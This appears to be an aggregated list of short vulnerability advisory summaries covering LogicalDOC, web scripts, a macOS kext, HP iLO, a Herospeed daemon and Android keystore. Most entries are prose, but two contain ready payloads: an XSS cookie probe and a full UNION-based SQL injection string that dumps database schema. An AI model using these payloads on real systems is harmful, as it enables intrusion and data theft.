LogicalDOC suffers from multiple authenticated OS command execution vulnerabilities by manipulating the path of the many binaries included in the package when changing the settings with their respected arguments. This can be exploited to execute local root privilege escalation attack and/or inject and execute arbitrary system commands as the root or SYSTEM user depending on the platform affected.
The application suffers from multiple post-auth file disclosure vulnerability when input passed thru the 'suffix' and 'fileVersion' parameters is not properly verified before being used to include files. This can be exploited to read arbitrary files from local resources with directory traversal attacks.
An attacker can exploit this vulnerability by inserting a malicious payload in the search parameter of the website. This will result in an error based SQL Injection.
A stored XSS vulnerability exists in the Multi Language Olx Clone Script, which allows an attacker to inject malicious JavaScript code into the application. The malicious code is executed when a user visits the vulnerable page. The attack vector is a comment, and the payload is <svg/onload=alert(document.cookie)>. To exploit the vulnerability, an attacker must first register and login to the application, then click on any listing and leave a comment with the malicious payload. The malicious code will then be executed when the page is visited.
The vulnerability allows an attacker to inject sql commands. Proof of Concept: http://localhost/jobsite-advanced/searchresult.php?searchindus&indus=[SQL] Parameter: indus (GET) Type: UNION QUERY Title: Generic UNION query (NULL) - 51 columns payload: UNION SELECT NULL,NULL,NULL,/*!00000Concat(0x3C62723E,version(),0x3C62723E,user(),0x3C62723E,database())*/,NULL,NULL,NULL,/*!00000group_coNcat(0x3C62723E,table_name,0x3a,column_name)*/,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL/*!00000from*/ information_schema.columns where table_schema=database()%23
AppleEmbeddedOSSupportHost.kext is presumably involved in the communication with the OS running on the touch bar on new MBP models. The IOUserClient superclass doesn't implement any locking for this method; it's up to the user client itself to correctly prevent dangerous concurrent accesses. By calling registerNotificationPort in two threads in parallel we can cause a AppleEmbeddedOSSupportHostClient to drop two references on a port when it only holds one. Note that AppleEmbeddedOSSupportHostClient is only reachable by root so this is a root -> kernel priv elesc.
This vulnerability allows an attacker to read sensitive files on the server by using XMLHttpRequest to send a GET request to the file. The attacker can then use the XMLHttpRequest to send the file contents to a remote server, allowing the attacker to steal the file contents.
A vulnerability in HP iLO 4 firmware version 2.53 and prior allows an attacker to execute arbitrary code on the target system. The vulnerability is due to improper validation of user-supplied input. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the targeted system. Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.
Herospeed TelnetSwitch daemon running on TCP/787, for allowing enable of the telnetd. Where one small stack overflow allows us to overwrite the dynamicly generated password and enable telnetd.
The keystore binder service (android.security.IKeystoreService) allows users to issue several commands related to key management, including adding, removing, exporting and generating cryptographic keys. The service is accessible to many SELinux contexts, including application contexts, but also unprivileged daemons such as 'media.codec'. Binder calls to this service are unpacked by IKeyStoreService and are then passed on to be processed by KeyStoreService. The 'generateKey' command is handled by 'KeyStoreService::generateKey'. This method uses 'KeyStoreService::checkBinderPermission' in order to validate the calling process's permissions, however, this method does not properly validate the calling process's permissions, allowing an unprivileged process to gain access to privileged operations.
Services By CQR